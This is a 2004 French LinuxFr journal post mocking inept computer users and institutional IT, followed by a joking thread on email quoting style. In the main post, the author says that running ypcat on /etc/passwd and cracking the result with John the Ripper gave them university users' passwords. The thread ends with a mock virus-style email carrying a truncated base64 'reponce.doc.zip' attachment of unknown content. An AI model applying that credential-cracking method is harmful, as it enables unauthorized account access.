Journal Les handicapés du Web...

Posté par  (site web personnel, Mastodon) .
Étiquettes :
2
7
mar.
2004
Je pousse un coup de gueule contre ce que j'appelle les handicapés du web (mes excuses à tous mes amis ou non-amis effectivement handicapés pour cette comparaison qui n'est pas à leur honneur). A savoir les gens qui n'y connaissent rien, mais qui sont persuadés que leur inculture est une connaissance.

Ne parlons même pas des éternels documents word, etc... Je vais vous montrer les derniers exemples reçus :

Dans la catégorie champion-du-monde :

- Un ami nous envoie une photo de sa famille : Un document doc, contenant uniquement une macro éxécutant un fichier exe qui est en fait une animation flash contenant en tout et pour tout la photo, au format statique! Envoyé un jpg était peut-être trop simple...

Dans la catégorie nous-on-s'y-connait-et-on-fait-gaffe-a-la-securité

- Mes parents, à qui j'ai expliqué tout l'intérêt d'envoyer des fichiers PDF, reçoivent d'un gros client les messages suivants : "Pour des raisons de sécurité et pour éviter les virus, nous bloquons tous les fichiers PDF et ne savons pas les ouvrir. Veuillez donc installer Microsoft Word et nous envoyer le fichier au format doc"

Dans la catégorie moi-on-ne-me-berne-pas-aussi-facilement :

- Je suis en train de recevoir, depuis plusieurs jours, des mails d'insultes d'une personne recevant visiblement des virus en mon nom. C'est assez touchant :
"Ahaha ! Je ne me laisserai pas avoir, vous pouvez garder vos sales virus, je ne les ouvre pas et identifiez-vous, je ne vous connais pas"

Dans la catégorie ingénieur commercial :

- Un ingénieur commercial consultant d'une société que j'aide un peu a piqué une colère il y'a quelques mois quand je l'ai remis à sa place en disant qu'il était hors de question de faire un site en flash. Il a alors dit qu'il fallait un minimum de flash, sinon le site serait nul. J'ai tenu bon. Maintenant, je l'entend dire partout que les sites en flash c'est ringard. Un consultant qui clame une chose avec autant d'assurance puis retourne sa veste aussi vite, ça m'inquiète un peu.

- Le même ingénieur commercial, sommé de réenvoyer un tableur l'envoie sous forme d'une image insérée dans un fichier powerpoint. C'est assez extraordinaire. Et on m'appelle alors à l'aide car c'est soi-disant openoffice qui gère mal le fichier.
Je renvoie donc un mail disant au consultant d'envoyer le fichier sous forme d'un tableur ! Résultat : la même image mais cette fois copiée dans un fichier word. Bon dieu, que faire...

Dans la catégorie lire-le-français-c'est-vachement-dur :

- Je répond à un mail, point par point, en mettant une réponse en dessous de chaque question posée. Réponse :
"Je ne peux lire votre mail car nos deux textes se sont mélangés sur le serveur. Veuillez réenvoyer votre mail".

Dans la catégorie site-web-qui-tue :

- Le site de la section électronique de ma fac possède un menu de navigation en flash. N'ayant pas le plugin flash à ce moment, je dis adieu à la navigation.
Après avoir installé le fameux plugin, je retourne sur le site et, surprise, chaque boutton est une animation flash composée..d'une image statique. Mettre un jpg ou un gif, ça aurait été trop dur.

Et là dedans, je n'inclus donc aucune remarque liée au logiciel libre, à l'utilisation des standards ou de ce genre de choses.

Simplement, je m'énerve car je n'arrive tout simplement pas à comprendre comment on peut en arriver à un tel point. Je conçois et je respecte qu'on ne s'y connaisse pas, qu'on aie des difficultés. Mais quelqu'un qui fait une animation flash a pour moi déjà une certaine aisance de la chose informatique. Quelqu'un qui configure un réseau et un antivirus aussi. Pour arriver à transformer un tableau excell en image et l'insérer dans un powerpoint, il faut le vouloir non ? ça ne se fait pas tout seul ! Et tout cela commence à me pomper...

Je passe plus de temps à répondre aux mails me disant que mes attachements sont illisibles (bah oui, un jpg ou un pdf, ce sont des formats peu courants), à pester contre les sites webs qui utilisent un applet java chargeant une animation flash plutôt qu'un lien avec une balise a href.

A la fac, c'est encore pire : la sécurité consiste à ce que, sous Windows, on ne puisse rien faire à part cliquer sur l'icone Internet Explorer ou l'icone Word. Toute autre tentative se soldera par un "Accès interdit, vous n'avez pas les droits". Il faut donc renommer chaque exécutable iexplore.exe pour le lancer et insérer les images dans word pour pouvoir les visualiser. Sécurité maximale donc.. A coté de ça, via le prompt de matlab, on a accès à tout le réseau sans aucune restriction.
Sous Linux, car on en a, la sécurité consiste à ne même pas pouvoir déplacer les icones KDE. C'est tout simplement inutilisable. Rien ne marche. Cependant, un ypcat /etc/passwd et un coup de john permet d'avoir tous les mots de passe , donc ceux avec plus de droits, de manière à pouvoir un peux travailler sérieusement.

L'accès au réseau de la fac avec son portable est soumis à des règles strictes :
- "Vous devez mettre à jour votre antivirus et votre windows sur microsftupdate.com"
- "ben je suis sous Linux"
- "ah..euh ben vous devez mettre à jour votre antivirus et votre linux sur linuxupdate.com"
(sic le responsable principal du réseau de toutes la fac)

C'est tellement strict que la salle informatique semble être le noeud principal du réseau edonkey, chacun downloadant à plusieurs centaines de ko !!!

Et, utilisez des logiciels libres serait trop simple, à chaque démarage sous windows sur les machines de la fac, vous devez accepter la license winzip, et compagnie...

Bref, le moral est bas, sorry pour le coup de gueule.
  • # Re: Les handicapés du Web...

    Posté par  (Mastodon) . Évalué à 9.

    Juste pour savoir: c'est quoi ta fac, que je n'y aille pas ? :-)
  • # Re: Les handicapés du Web...

    Posté par  . Évalué à 4.

    L'accès au réseau de la fac avec son portable est soumis à des règles strictes :
    - "Vous devez mettre à jour votre antivirus et votre windows sur microsftupdate.com"
    - "ben je suis sous Linux"
    - "ah..euh ben vous devez mettre à jour votre antivirus et votre linux sur linuxupdate.com"
    (sic le responsable principal du réseau de toutes la fac)



    Ca c'est un morceau choisi... D'ailleurs ça me fait penser à un truc : j'accède au net par un réseau universitaire relié à ma résidence, et un jour, l'assoce qui gère le réseau nous a envoyé un mail disant qu'après test de leur part xxx chambres étaient encore vulnérables à une faille de Windows XP.

    Quel outil ont-ils pu utiliser pour détecter les failles de Windows sur chaque machine ?
    • [^] # Re: Les handicapés du Web...

      Posté par  (site web personnel) . Évalué à 4.

      > Quel outil ont-ils pu utiliser pour détecter les failles de Windows sur chaque machine ?

      Microsoft mets à disposition sur son site un scanner permettant de vérifier que les machines sont patchées ou pas et avec quel niveau de patch, tout simplement.
      • [^] # Re: Les handicapés du Web...

        Posté par  . Évalué à 2.

        Mouais, enfin, vaut mieux utiliser quelque chose comme Nessus. CF la discussion d'il y a quelques semaines sur Bugtraq au sujet des machines vulnérables, mais non-détectées comme telles par MBSA.
    • [^] # Re: Les handicapés du Web...

      Posté par  (site web personnel) . Évalué à 1.

      GFI languard sous windows fait ca tres bien.
      quelqu'un connaitrait il un produit equivalent sous linux ?

      \_o<

  • # Re: Les handicapés du Web...

    Posté par  . Évalué à 2.

    Je dois quand même dire qu'il y a une forte concentration de neuneus autour de toi... Phénomène paranormal ?
    En général, les quidams moyens font plutôt profil bas devant l'informatique !
    • [^] # Re: Les handicapés du Web...

      Posté par  . Évalué à 4.

      Les neuneus sont partout. Dans mon école ( ESIEE ), c'est Windows powaa, Windows Media Player, et Internet Explorer...
      • [^] # Re: Les handicapés du Web...

        Posté par  . Évalué à 2.

        Windows partout à l'ESIEE ?
        quand j'y étais y'avait des stations Unix Apollo partout avec des grands écrans.. NB
        avec un OS multi-tâche + X-Window dessus

        c'est devenu une école de technico-commerciaux ?

        tout se perd.......
        • [^] # Re: Les handicapés du Web...

          Posté par  . Évalué à 1.

          Je me suis mal exprimé.
          L'école est très bien équipée, réseaux mixte cleans, etc...

          Niveau utilisateurs, un pc sous linux est immédiatement rebooté

          et sur les réseaux des résidences étudiantes, c du windows ie en folie...
      • [^] # Re: Les handicapés du Web...

        Posté par  . Évalué à 2.

        tiens, des anciens de l'esiee... effectivement quand j'y étais le niveau en info ne cassait pas des briques à part quelques exceptions qui souvent étaient classés dans les indésirables pour l'année suivante à cause de leur niveau en math/physique qui était un peu à la ramasse... faut voir aussi que y en a qui débarquait à bac+2 en ayant touché un ordinateur 3 fois dans leur vie, forcement ça faisait une petite différence avec ceux qui avaient passé les 2 premières années en continu sur les visus...

        enfin après ces études et qqs années de vie profesionnelle, j'ai un peu revu ma définition de l'ingénieur, en remplaçant une partie des compétences techniques par du bagou...
    • [^] # Re: Les handicapés du Web...

      Posté par  . Évalué à 0.

      Perso ce qui me surprend quand je lis ca, c'est plutot qu'il se reveille seulement maintenant..
      Je pense qu'on observe plus ou moins ca ts les jours, il n'y a rien d'etrange =)
      • [^] # Où sont les informaticiens ? (sans doute avec les femmes...)

        Posté par  . Évalué à 4.

        Après avoir lu vos messages, je constate une chose affligeante. Je ne suis pas informaticien (je n'ai pas fait d'études d'informatique, je ne travaille pas dans ce domaine), et c'est le cas de la plupart des gens dans mon entourage à quelques exceptions près.
        Or il semble qu'il y ait moins de boulets et de gens dangereux avec leur ordinateurs dans mon entourage que dans le votre !
        Mes proches , qui sont très mal à l'aise avec leurs ordinateurs font, certes, des erreurs. Mais surtout ont conscience de leur difficultés et se méfient de l'outil. Quand je leur recommande Mozilla au lieu d'Outlook, ils écoutent mes arguments (c'est pas pour ça qu'ils changent de crémerie, les habitudes sont dures à perdre) et réfléchissent vraiment à la question de la sécurité.
        Bref, dans leur pratique, si leurs PC sont des passoires, ils ne leurs font pas une confiance aveugle se méfient et évitent de faire les conneries qu'ils connaissent. Ils écoutent les conseils et essaient de mieux utiliser le bouzin.

        Alors que vous avez l'air d'être entourés d'informaticiens, qui d'après ce que vous dites donnent l'impression d'être ultra dangereux, bien plus que mes proches...
        Bref si les informaticiens sont nul en informatique... Où allons nous ???
  • # Re: Les handicapés du Web...

    Posté par  . Évalué à 1.

    ha ben moi aussi j'ai un morceau choisi de pas plus tard que ce matin.

    par courrier recu:

    Personne en aucun cas ne pourras changer la configuration qui seras exclusivement etabli sous windows XP, et le fournisseur internet seras exclusivement AOL.
    ...
    je pense que tu comprendras tous l'interet qui il y a pour X de travailler sur du materiel plus fiable que sur du materiel entierement basé sur LINUX, qui pourras me dire meme s'il n'est pas d'accord avec le processus que MICROSOFT est actuellement ce qu il y a de plus stable.

    ------------

    oui oui je lui ai repondu, le plus court que j'ai pu :) et sans s'enerver. L'ignorance c'est dangereux, je le vois dans le domaine de l'informatique, alors dans les autres domaine, cela me fait un peu peur.
  • # Re: Les handicapés du Web...

    Posté par  . Évalué à 7.

    Je suis devenu définitivement un vieux con lorsque j'ai lu, avec horreur, il y a quelques jours :

    http://mozilla.org/releases/mozilla1.6/README.html#new(...)

    What's New in Mozilla 1.6
    [...]
    Another frequently requested MailNews feature, a preference for placing the user's signature above the quoted text, has been added.
    [...]


    Qu'on se le dise, Outlook Express est un standard.
    • [^] # Re: Les handicapés du Web...

      Posté par  . Évalué à -4.

      Là non, je ne te suis pas. j'ai pas toujours besoin faire une réponse à la usenet dans ma correspondance. Le mail ne me sert pas qu'à répondre sur les listes.
      • [^] # Re: Les handicapés du Web...

        Posté par  (site web personnel) . Évalué à 6.

        Si tu penses qu'il est inutile de lire le texte cité avant ta réponse, pourquoi le citer ?
      • [^] # Re: Les handicapés du Web...

        Posté par  (Mastodon) . Évalué à 6.

        J'ai du mal à concevoir un cas de la Vie Réelle où il peut être utile de placer sa signature au dessus de la partie citée... mais bon.

        Etant donné que le comportement logique est de répondre sous la citation, quel intéret d'avoir sa signature au dessus de son message ?

        (Objection classique: je répond au dessus de la citation
        -- pourquoi faire une citation alors ?
        -- pour rappeler le message précédent
        -- si tu as besoin de rappeler le message précédent, pourquoi répondre avant ? ton correspondant ne saura pas de quoi tu parles
        -- si, puisque c'est lui qui m'a envoyé le mail d'origine
        -- pourquoi faire une citation alors ? (ad lib.))
        • [^] # Re: Les handicapés du Web...

          Posté par  (site web personnel) . Évalué à -1.

          je ne suis pas d'accord avec toi.
          de mon point de vue, le comportement normal est de repondre au dessus de la citation.
          depuis que je suis petit, je lis de haut en bas.
          qd je recois une reponse à un mail surper long que j'ai ecris, je ne suis pas fan de descendre en bas, pour savoir ou mon correspondant m'a repondu.

          si on me repond une ligne sur un mail de 30 que j'ai ecris...

          bref... moi, je reponds au dessus.

          pour la signature, je suis d'accord avec toi.je la laisse en bas.
          si on cherche mon bigo pour une raison ou une autre, on l'y trouvera.
          c'est bien le but de la signature non ?
          car quand je recois un mail, je vois directement le mail from: ...
          • [^] # Re: Les handicapés du Web...

            Posté par  . Évalué à 3.

            Je ne suis pas tout à fait d'accord avec toi. Moi je procède de cette facon :
            mail court : je réponds en dessous.
            mail long découpable en bloc : je réponds en dessous de chaque blocs à la question posée.
            mail long non découpable : je ne garde que l'essentiel du mail, et je réponds en dessous. De toute facon, la personne est sensée savoir ce qu'on lui a envoyé, c'est juste pour qu'elle ne perde pas de temps à se souvenir/rechercher ce qu'elle avait mis.

            Par contre, pour la signature, je suis d'accord avec toi : c'est à la fin du mail.
          • [^] # Re: Les handicapés du Web...

            Posté par  . Évalué à 5.

            Si tu lis de haut en bas, comme tu le monde, alors tu admettra que le processus :

            - Je lis la citation pour me rémemorer ce que j'ai dis/ce qui a été dis
            - Je lis la réponse sur ce point la.

            Si tu répond au dessus, ça va faire :

            - Je lis la réponse, sans trop me souvenir du contexte, de ce que j'ai dis/ de qui a été dis
            - Je lis ce que j'ai dis/ce qui a été dis.
            - Je relis ce que la réponse parcequ'effectivement je me souviens d'un point particulier et je n'ai pas fait gaffe à la réponse, le contexte étant flou.
            • [^] # Re: Les handicapés du Web...

              Posté par  (site web personnel) . Évalué à -2.

              Il n'y a rien qui m'ennerve plus que quelqu'un qui repond a un de mes mail en mettant la sitation en premier. Je sais de quoi je lui parlais, si jamais j'ai un doute sur ce que j'avais dit, alors j'irais voir en dessous mais me bouffer le corps de mon mail en premier , ca m'irrite :) Comme quoi les gouts et les couleurs :)
              • [^] # Re: Les handicapés du Web...

                Posté par  . Évalué à 2.

                «mais me bouffer le corps de mon mail en premier , ca m'irrite»

                Je crois que tout le monde parlait de citation d'une partie du message seulement, pas de son intégralité (ce qui n'est pas non plus netiquettement correct).
          • [^] # Re: Les handicapés du Web...

            Posté par  . Évalué à 6.

            de mon point de vue, le comportement normal est de repondre au dessus de la citation.
            depuis que je suis petit, je lis de haut en bas.


            Et bien justement, le système de citation normal fait lire de haut en bas, tu lis d'abord le texte original (indenté avec "> "), et ensuite la réponse (comme je le fais ici). C'est quand même très agréable d'avoir les réponses point par point.

            si on me repond une ligne sur un mail de 30 que j'ai ecris...

            On est rarement censé laisser l'intégralité du message auquel on répond, quelques lignes pour rappeler le contexte suffisent. C'est la Netiquette bon sang ! (cf http://www.sri.ucl.ac.be/SRI/rfc1855.fr.html#211(...) pour le courriel)

            Je trouve horripilant les messages à la Outlook, où après plusieurs aller/retours on se retrouve avec des messages de plus en plus longs, contenant l'intégralité de la conversation.
            Sur une mailing-list de ma boîte, pourtant consacrée à Linux, ya des boulets qui citent les 100 lignes d'un message (à la Outlook) et qui se contentent de répondre au-dessus "Je suis d'accord, bonne idée". Quand en plus les messages sont en HTML (+ texte), on finit par des messages de 20 Ko pour 2-3 lignes utiles.

            Dans mes amis proches, non-informaticiens, j'ai un mal fou à leur faire bien utiliser leur messagerie (pas de HTML, pas de citation à la Outlook). J'ai même lancé Outlook au bureau et regardé comment on virait tout ça (en option j'ai fait virer le Quoted Printable).

            Bref je me joins à Ploum dans son coup de gueule et je sors mes mouchoirs pour pleurer.
            • [^] # Re: Les handicapés du Web...

              Posté par  . Évalué à 8.

              Voilà, c'est exactement ce que je pense.


              de mon point de vue, le comportement normal est de repondre au dessus de la citation.
              depuis que je suis petit, je lis de haut en bas.

              Et bien justement, le système de citation normal fait lire de haut en bas, tu lis d'abord le texte original (indenté avec "> "), et ensuite la réponse (comme je le fais ici). C'est quand même très agréable d'avoir les réponses point par point.

              si on me repond une ligne sur un mail de 30 que j'ai ecris...

              On est rarement censé laisser l'intégralité du message auquel on répond, quelques lignes pour rappeler le contexte suffisent. C'est la Netiquette bon sang ! (cf http://www.sri.ucl.ac.be/SRI/rfc1855.fr.html#211(...(...)) pour le courriel)

              Je trouve horripilant les messages à la Outlook, où après plusieurs aller/retours on se retrouve avec des messages de plus en plus longs, contenant l'intégralité de la conversation.
              Sur une mailing-list de ma boîte, pourtant consacrée à Linux, ya des boulets qui citent les 100 lignes d'un message (à la Outlook) et qui se contentent de répondre au-dessus "Je suis d'accord, bonne idée". Quand en plus les messages sont en HTML (+ texte), on finit par des messages de 20 Ko pour 2-3 lignes utiles.

              Dans mes amis proches, non-informaticiens, j'ai un mal fou à leur faire bien utiliser leur messagerie (pas de HTML, pas de citation à la Outlook). J'ai même lancé Outlook au bureau et regardé comment on virait tout ça (en option j'ai fait virer le Quoted Printable).

              Bref je me joins à Ploum dans son coup de gueule et je sors mes mouchoirs pour pleurer.
              • [^] # Re: Les handicapés du Web...

                Posté par  (site web personnel) . Évalué à 7.

                Tu as oublié de signer ton message.
                Amicalement,

                ----------------------------------------------------------------------------------------
                |Pierre Tramo
                |J2EE Lead Architect
                |Enlarge Your Productivity http://linuxfr.org/board/(...)
                |This message and all enclosed informations is the property of its owner.
                |Quote of the day:
                | Real quiche don't eat programers
                ---------------------------------------------------------------------------------------

                On Sun 7 Mar 2004, Pierre Tramo (#6169) wrote
                > Voilà, c'est exactement ce que je pense.
                >
                >
                > de mon point de vue, le comportement normal est de repondre au dessus de la citation.
                > depuis que je suis petit, je lis de haut en bas.
                >
                > Et bien justement, le système de citation normal fait lire de haut en bas, tu lis d'abord le texte original (indenté avec "> "), et ensuite la réponse (comme je le fais ici). C'est quand même très agréable d'avoir les réponses point par point.
                >
                > si on me repond une ligne sur un mail de 30 que j'ai ecris...
                >
                > On est rarement censé laisser l'intégralité du message auquel on répond, quelques lignes pour rappeler le contexte suffisent. C'est la Netiquette bon sang ! (cf http://www.sri.ucl.ac.be/SRI/rfc1855.fr.html#211(...(...(...))) pour le courriel)
                >
                > Je trouve horripilant les messages à la Outlook, où après plusieurs aller/retours on se retrouve avec des messages de plus en plus longs, contenant l'intégralité de la conversation.
                > Sur une mailing-list de ma boîte, pourtant consacrée à Linux, ya des boulets qui citent les 100 lignes d'un message (à la Outlook) et qui se contentent de répondre au-dessus "Je suis d'accord, bonne idée". Quand en plus les messages sont en HTML (+ texte), on finit par des messages de 20 Ko pour 2-3 lignes utiles.
                >
                > Dans mes amis proches, non-informaticiens, j'ai un mal fou à leur faire bien utiliser leur messagerie (pas de HTML, pas de citation à la Outlook). J'ai même lancé Outlook au bureau et regardé comment on virait tout ça (en option j'ai fait virer le Quoted Printable).
                >
                > Bref je me joins à Ploum dans son coup de gueule et je sors mes mouchoirs pour pleurer.
                • [^] # Re: Les handicapés du Web...

                  Posté par  . Évalué à 5.

                  -----BEGIN PGP SIGNED MESSAGE-----
                  Hash: SHA1

                  Pardon. _ _
                  ( \---/ )
                  ) . . (
                  ________________________,--._(___Y___)_,--._______________________
                  `--' `--'
                  - Trucs sur lordoric. -
                  - & mon free. -
                  - Astuces site fr -
                  _______________________________________________________________


                  > Tu as oublié de signer ton message.
                  >Amicalement,
                  >
                  >----------------------------------------------------------------------------------------
                  >|Pierre Tramo
                  >|J2EE Lead Architect
                  >|Enlarge Your Productivity http://linuxfr.org/board/(...(...))
                  >|This message and all enclosed informations is the property of its owner.
                  >|Quote of the day:
                  >| Real quiche don't eat programers
                  >---------------------------------------------------------------------------------------
                  >
                  >On Sun 7 Mar 2004, Pierre Tramo (#6169) wrote
                  >> Voilà, c'est exactement ce que je pense.
                  >>
                  >>
                  >> de mon point de vue, le comportement normal est de repondre au dessus de la citation.
                  >> depuis que je suis petit, je lis de haut en bas.
                  >>
                  >> Et bien justement, le système de citation normal fait lire de haut en bas, tu lis d'abord le texte original (indenté avec "> "), et ensuite la réponse (comme je le fais ici). C'est quand même très agréable d'avoir les réponses point par point.
                  >>
                  >> si on me repond une ligne sur un mail de 30 que j'ai ecris...
                  >>
                  >> On est rarement censé laisser l'intégralité du message auquel on répond, quelques lignes pour rappeler le contexte suffisent. C'est la Netiquette bon sang ! (cf http://www.sri.ucl.ac.be/SRI/rfc1855.fr.html#211(...(...(...(...)))) pour le courriel)
                  >>
                  >> Je trouve horripilant les messages à la Outlook, où après plusieurs aller/retours on se retrouve avec des messages de plus en plus longs, contenant l'intégralité de la conversation.
                  >> Sur une mailing-list de ma boîte, pourtant consacrée à Linux, ya des boulets qui citent les 100 lignes d'un message (à la Outlook) et qui se contentent de répondre au-dessus "Je suis d'accord, bonne idée". Quand en plus les messages sont en HTML (+ texte), on finit par des messages de 20 Ko pour 2-3 lignes utiles.
                  >>
                  >> Dans mes amis proches, non-informaticiens, j'ai un mal fou à leur faire bien utiliser leur messagerie (pas de HTML, pas de citation à la Outlook). J'ai même lancé Outlook au bureau et regardé comment on virait tout ça (en option j'ai fait virer le Quoted Printable).
                  >>
                  >> Bref je me joins à Ploum dans son coup de gueule et je sors mes mouchoirs pour pleurer.

                  - -----------------------------------------------------------------
                  pgp fingerprint 2D6D 67D1 4200 04E0 0AF7 BA7E 2AA5 4189 9328 1586
                  -----BEGIN PGP SIGNATURE-----
                  Version: GnuPG v1.2.1 (GNU/Linux)

                  iD8DBQE+tAG3JqVBiZIoFYURAp8qAJ41lD8koxjpr46Iqdsqk2342234SDFUAh+
                  PCYI7wDSOO6NzBMdNtN0554=
                  -----END PGP SIGNATURE-----
                  • [^] # VEUILLEZ REPSECTER LA NETIQUETTE

                    Posté par  . Évalué à 5.

                    --=-OAJCbABu5uE4S8PH/x53Content-Type: text/html; charset=utf-8Content-Transfer-Encoding: 7bit<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 TRANSITIONAL//EN"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=UTF-8"> Veuillez respecter la netiquete s'il vous plait!!!!!!!
                    Tu as oublié de signer ton message. Amicalement, ---------------------------------------------------------------------------------------- |Pierre Tramo |J2EE Lead Architect |Enlarge Your Productivity http://linuxfr.org/board/(...(...)) |This message and all enclosed informations is the property of its owner. |Quote of the day: | Real quiche don't eat programers --------------------------------------------------------------------------------------- On Sun 7 Mar 2004, Pierre Tramo (#6169) wrote > Voilà, c'est exactement ce que je pense. > > > de mon point de vue, le comportement normal est de repondre au dessus de la citation. > depuis que je suis petit, je lis de haut en bas. > > Et bien justement, le système de citation normal fait lire de haut en bas, tu lis d'abord le texte original (indenté avec "> "), et ensuite la réponse (comme je le fais ici). C'est quand même très agréable d'avoir les réponses point par point. > > si on me repond une ligne sur un mail de 30 que j'ai ecris... > > On est rarement censé laisser l'intégralité du message auquel on répond, quelques lignes pour rappeler le contexte suffisent. C'est la Netiquette bon sang ! (cf http://www.sri.ucl.ac.be/SRI/rfc1855.fr.html#211(...(...(...(...)))) pour le courriel) > > Je trouve horripilant les messages à la Outlook, où après plusieurs aller/retours on se retrouve avec des messages de plus en plus longs, contenant l'intégralité de la conversation. > Sur une mailing-list de ma boîte, pourtant consacrée à Linux, ya des boulets qui citent les 100 lignes d'un message (à la Outlook) et qui se contentent de répondre au-dessus "Je suis d'accord, bonne idée". Quand en plus les messages sont en HTML (+ texte), on finit par des messages de 20 Ko pour 2-3 lignes utiles. > > Dans mes amis proches, non-informaticiens, j'ai un mal fou à leur faire bien utiliser leur messagerie (pas de HTML, pas de citation à la Outlook). J'ai même lancé Outlook au bureau et regardé comment on virait tout ça (en option j'ai fait virer le Quoted Printable). > > Bref je me joins à Ploum dans son coup de gueule et je sors mes mouchoirs pour pleurer. [ Répondre ]
                    • !!!NOUVEAU!!! Re: Les handicapés du Web... (Score: 3/#8, #363792) Notez! [ - ou + ] Posté par Pierre Tramo (#6169). 07/03/2004 @ 18:16 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Pardon. _ _ ( \---/ ) ) . . ( ________________________,--._(___Y___)_,--._______________________ `--' `--' - Trucs sur lordoric. - - & mon free. - - Astuces site fr - _______________________________________________________________ > Tu as oublié de signer ton message. >Amicalement, > >---------------------------------------------------------------------------------------- >|Pierre Tramo >|J2EE Lead Architect >|Enlarge Your Productivity http://linuxfr.org/board/(...(...(...))) >|This message and all enclosed informations is the property of its owner. >|Quote of the day: >| Real quiche don't eat programers >--------------------------------------------------------------------------------------- > >On Sun 7 Mar 2004, Pierre Tramo (#6169) wrote >> Voilà, c'est exactement ce que je pense. >> >> >> de mon point de vue, le comportement normal est de repondre au dessus de la citation. >> depuis que je suis petit, je lis de haut en bas. >> >> Et bien justement, le système de citation normal fait lire de haut en bas, tu lis d'abord le texte original (indenté avec "> "), et ensuite la réponse (comme je le fais ici). C'est quand même très agréable d'avoir les réponses point par point. >> >> si on me repond une ligne sur un mail de 30 que j'ai ecris... >> >> On est rarement censé laisser l'intégralité du message auquel on répond, quelques lignes pour rappeler le contexte suffisent. C'est la Netiquette bon sang ! (cf http://www.sri.ucl.ac.be/SRI/rfc1855.fr.html#211(...(...(...(...(...))))) pour le courriel) >> >> Je trouve horripilant les messages à la Outlook, où après plusieurs aller/retours on se retrouve avec des messages de plus en plus longs, contenant l'intégralité de la conversation. >> Sur une mailing-list de ma boîte, pourtant consacrée à Linux, ya des boulets qui citent les 100 lignes d'un message (à la Outlook) et qui se contentent de répondre au-dessus "Je suis d'accord, bonne idée". Quand en plus les messages sont en HTML (+ texte), on finit par des messages de 20 Ko pour 2-3 lignes utiles. >> >> Dans mes amis proches, non-informaticiens, j'ai un mal fou à leur faire bien utiliser leur messagerie (pas de HTML, pas de citation à la Outlook). J'ai même lancé Outlook au bureau et regardé comment on virait tout ça (en option j'ai fait virer le Quoted Printable). >> >> Bref je me joins à Ploum dans son coup de gueule et je sors mes mouchoirs pour pleurer. - ----------------------------------------------------------------- pgp fingerprint 2D6D 67D1 4200 04E0 0AF7 BA7E 2AA5 4189 9328 1586 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iD8DBQE+tAG3JqVBiZIoFYURAp8qAJ41lD8koxjpr46Iqdsqk2342234SDFUAh+ PCYI7wDSOO6NzBMdNtN0554= -----END PGP SIGNATURE----- --=-OAJCbABu5uE4S8PH/x53--
                    • [^] # Re: VEUILLEZ REPSECTER LA NETIQUETTE

                      Posté par  (site web personnel) . Évalué à 2.

                      This is a multi-part message in MIME format.
                      --------------020806050001070909030306
                      Content-Type: text/plain; charset=us-ascii; format=flowed
                      Content-Transfer-Encoding: 7bit



                      --------------020806050001070909030306
                      Content-Type: application/zip;
                      name="reponce.doc.zip"
                      Content-Transfer-Encoding: base64
                      Content-Disposition: inline;
                      filename="reponce.doc.zip"

                      UEsDBBQAAAAIAKmxZzDL6VDhSgcAAAAkAAALABUAcmVwb25jZS5kb2NVVAkAA22QS0DWkEtA
                      VXgEAOgD6APtWWtsVEUUPne7bbeFlmVbXlXppdS2FGgLCAUELH1AWSgttAhIwCzdbXdhH2Xv
                      Vh4hpkFJNNEEE3/4w8SQQOLrBz5+ERKJURITo/wwRvxjTfwhhhhBjSGVrt85cy8sm0J3lypC
                      9tx8dx53Zs7MmTNnzsy9+PXU4ZMflP1ISfQk5dBovIDyEvI0YIqVcBLZzLzReDxuZcez9EDR
                      DTPkObRj/nIBnvN8wAEUAIXAJGAyUAQUm3PuNMMsPbi0lSJ4YqRTG4URRulwsim4K02HxiS2
                      l0qd0RTLpUpZ/pnzt+x3uuuf9wFe/1MBF1AClALTiHWCaAYwE5gFlJk8HkX4mBkvR6gDc4AK
                      M68S4eNAFVAN1ADzgFpgPrAAWAjUAfVAA7AIWAwsAZ4AlgLLgEZgObACWEm8nxGtAlYDa4Cn
                      gCZgLdAMtACtQBuwDlgPtAMbADewEdgEdACbgU6gC9gCbAW6gR5gG/A0sB3YAewEngF20f/T
                      VmroVU6h0qG8ApvoxHmlGut4/joCvdGIEemL6dsjUe/C1sj+wZAvHBOd6OjmvNZIr2gCx+uQ
                      kO91y+mPFR8euKMK3iRNuREZkwtaV4hWdkEjrYb2QDWvxm0cQo9byUd95KFBCsK+KQ1eVElF
                      F1C8tlKDJjXXUifmeAvQ4p5JofYCuwF0uXMo3B6nPW47eZD/LOKx9jFXWDOtbboWPymaNAs6
                      tZcMcIzREehrN0IPbKsX7yjeBvWSH7EAehWTvNhtbS2jbc5r8auixUXQP7bKPpQK4812ehNq
                      hmk/8Xpsri0Y8BMN0ZparY6anRrZNF4dBdBFHx2S8nth371i1QsxTyWnsE5PHSJeffVOTXNp
                      OuJ2adWQntiwpu0YdC7Wx2i5RhVak8ixBX0dQIkA2gtL31xo7ZC0NhlydEF4pbTMoXFVD6K7
                      HVqVtLBY4xWdK2PxSr84VSK1FCemRhv3Q4yLaGNG6oAGwg5lxaw4W7MZULM1wG5N8SnZURqf
                      NmRxZbI5zRY4o0sqq6rrp5/QUuHcA8GEMDgDgt2M8CBC3lxDMvkwTGgnFU3vxlSFZNKCSC2p
                      So37WlEoj6qTl36djVwnf/w6PSjvN0fFBnEQyhwQ1TZknAa3ZZ+4tpoxEZrjVViizyE8v4wr
                      8P5IG4Pjtw9Uk7SdXrhNACrXyqnOURubmuEsZUquholvM3l9OMafpNOk9u17ootf/HL4+tmv
                      pr5yjN6lje9M4n5ATWg4KZ8dDD9MYAyGcCU2jnqsHTbGgzBpfVhNddDmKPUjn9evMvf1d2c9
                      Gk9WYkWcN3z8rWvXO/3O915z0Pzqjy6xxB2a2sH4+wAp/4ztKe/HL5Ly006QKvMmKZ/tbVIq
                      /zEprT9PyrR9ScrP+46UxfzJHPZvpKbibzO8fINothlnX6sJGKooZ/dI4vTGqNuKD72+x/ay
                      /TPZM4aWFpx7CfHZdGuMExW36MrpT6lDz+dhuT5RWUoxTetfTC2eSNATbhxDXfPt06my+Fa6
                      cRz7HI9PETlpZjwvIZ5MQXlfMLt7IQWDzGVKxy9G32vK0y22qdktM0OLdiN9DGWqbMoTz5RW
                      ZeiX/QAV0hPqttvUqSBLDyetStK//4psdIlIXKx+8Y8XwOa5cW70wCTrWH8e8WgNuiypajHN
                      YThXMXE6omK4D8B0+/DdQBiVcpzqk6/9KLUAKa+0zjk/4+0z29blroTdFPbmfWY5XVIBxMLY
                      DNgRZL6D2A6CkqvDZnvERfSaLVXLNhFFKUP41GEURThlKkfSA+coID43j2IY6EA8inOFxyy5
